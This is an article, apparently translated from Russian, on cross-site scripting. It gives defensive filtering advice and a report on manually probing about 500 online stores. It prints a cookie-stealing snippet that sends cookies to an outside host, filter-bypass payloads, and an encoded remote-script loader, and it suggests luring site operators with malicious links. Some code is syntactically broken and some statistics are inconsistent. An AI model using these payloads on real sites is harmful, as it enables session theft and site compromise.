Today, one of the most popular types of attacks is cross-site scripting using javascript. In this article, we will look at what problems are caused by illegal use of javascript, security rules to prevent a possible xss attack and provide our own research related to checking sites for organized website security.

What is xss attack?

This is a type of attack that injects malicious code into web systems, forcing it to display modified data, replace links (visible / hidden) or display its own advertisements on the affected resource.

There are two directions of attacks:

Passive – which require the direct intervention of the subject of the attack. The point is to force the victim to follow a malicious link to execute the “malicious code”. This type of attack is more difficult to implement, because it is necessary to have not only technical, but also psychological knowledge.

ActiveIs a type of attack when a hacker tries to find a vulnerability in a website filter. How is such an attack implemented? Everything is very simple. It is necessary to create such a request using a combination of tags and symbols so that the site understands it and executes the command. As soon as a security hole is found, a “malicious code” can be inserted into our request, which, for example, will steal cookies and send them to a convenient place for us. Here is an example of a script that steals cookies from a website:

Img = new image()
Img.src = http://site.gif?+document.cookie;

You usually have to work hard to find a security hole in your site, as most filters are robust enough. But people write them, and they tend to make mistakes.

Safety regulations

Where and why do such vulnerabilities arise, which lead to catastrophic consequences? It’s all about the attentiveness and knowledge of people. Developers must write correct code, so in this section we will discuss the minimum security rules for writing websites.

We have already described how the attack is applied, but we will repeat it again. The whole point of the xss attack is to detect a hole in the filter in order to bypass it.

1. One of the very first and basic rules for a developer is the use of any (even the most minimal) filter.

In our study of sites, almost all of them were protected, but still there were those that did not use any filtering of the received data. This is mainly found on sites written in PHP. But, for example, python frameworks such as: flask or Django already have built-in minimal filters, it only remains to strengthen them.

2. Filtering symbols and nested structures.

The minimal filter will protect us from amateur attacks and illiterate specialists, but from serious hackers we need to build more serious protection, with more detailed filtering of data. Developers should consider and understand the possible implementation of the xss attack and build the filter in such a way that it recognizes nested constructs. For example, a hacker can create a multi-level structure and insert malicious javascript code into the lowest one. The filter will block the upper layer, but the lower one will execute.

3. The filter should take into account all possible combinations of characters.

One of our favorite xss vulnerability checks is the use of open and closed parentheses.
For example: “/?,#”>>>><<script{()}

We write a command with n-th number of brackets. The filter sees this and tries to close them, but the nested code is executed. In this query, we not only check the filter for a different number of parentheses, but also see how the filter will react to different characters, whether it will block or pass them. Let’s pay your attention to the construction at the end of the example. We pass the script as an argument in parentheses. A fun way to test your filter. In our study, many sites did not filter this type of attack, being at risk.

4. Using tags.

Suppose you are filtering both symbols and layered constructs. But there is another vulnerability, it is associated with the img, bb, url tags. These tags have many parameters, including dynsrc and lowsrc, which contain javacsript. These tags must be filtered without fail. If you are not going to use pictures on the site, it is better to disable them altogether.

Usage example:

[img]http://blabla.ru/1.jpg/dynsrc=javascript:alert()[/img]

Unfortunately, simple tag filtering is not enough, you need to take into account the possibility that an attacker will place additional characters inside the tag, which must also be filtered.

For example:

[img]»»>«script>http://blabla.ru/1.jpg/dynsrc=javascript:alert()[/img]

5. Encryption.

When constructing a filter, one must first of all consider the possibility of encoding attacks. There are a large number of encoder programs that will encrypt an attack so that the filter cannot recognize it. Therefore, it is imperative to use the decryption algorithm in the filter before the program executes the request code.

Here is an example of the encrypted code:

%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E

Encryption is necessary not only to bypass the filter, but also for social engineering, deceiving people. You can send the encrypted code as a link. It is unlikely that someone will check it, hence another point follows.

6. Social Engineering It is

not enough to write a filter resistant to attacks; it is necessary to periodically hold lectures with employees about the rules for using the Internet and talk about possible tricks of hackers.

A couple of basic rules: never open suspicious links and check encrypted ones, especially if you are a hosting or network admin.

Investigation of sites for xss vulnerabilities using javascript.

How seriously do developers take the security of their web applications? Our team decided to check it out. As part of our research, we examined about 500 sites for security errors. A lot of time was spent on collecting, processing and structuring information. All checks were carried out manually, because we did not find the necessary tool, and there was not enough time and knowledge to write our own software. But, already having experience, next time we will do just that.

The objects of our research were the sites of online stores. We chose them, because on such sites there is a possibility of feedback. Through it, with the help of social engineering methods, you can inject a link with a malicious code to the site operator and compromise not only the leak of personal data, but also changing the site shell, illegally introducing your own advertising through javascript elements and replacing real links with malicious ones.

It is worth mentioning that we only checked the filters, this does not violate the legislation (272-274 of the Criminal Code) of the Russian Federation and does not bear any punishment.

As a result of the research, we got pretty good statistics. A very small percentage of sites, about 5%, do not have a filter, which is a fundamentally incorrectly built system. But in practice, it turned out that all these sites were developed by students. By default, sites without a filter are considered automatically hacked. they do not escape forbidden characters and you can upload “harmful code” to them via javascript. The rest of the sites have filters, but what about their reliability?

We were able to bypass about 11%, having only average knowledge in this area. This is a huge drawback on the part of the developers, which can bring a lot of harm to the project, because the personal data of users comes under attack. According to the law (article 13.11 of the Administrative Code, part 6), all sites must ensure the safety of personal data when storing material media and exclude unauthorized access to them. If this resulted in illegal access to personal data (destruction, modification, copying, blocking, etc.), a fine of 700 rubles to 50,000 rubles should be imposed.

Most of the sites are well protected from attacks, which is good news for us as users. The result of the study is clearly demonstrated in the diagram below.

Conclusion

As part of this article, we told you about xss vulnerabilities using javascript, we also conducted a real study of the strength and resilience of sites. As a result of the security assessment, it was found that most of the sites, namely 84%, are well protected from this type of attack. Still, there is a certain percentage of sites that are untrustworthy and cannot withstand attacks. This is a gross defect that needs to be corrected. Unfortunately, not all website owners are willing to invest in improving website security. But every year, the severity of the law in relation to disclosure, leakage and damage of personal data is tightening, thereby forcing unscrupulous owners to better monitor the safety of their resources.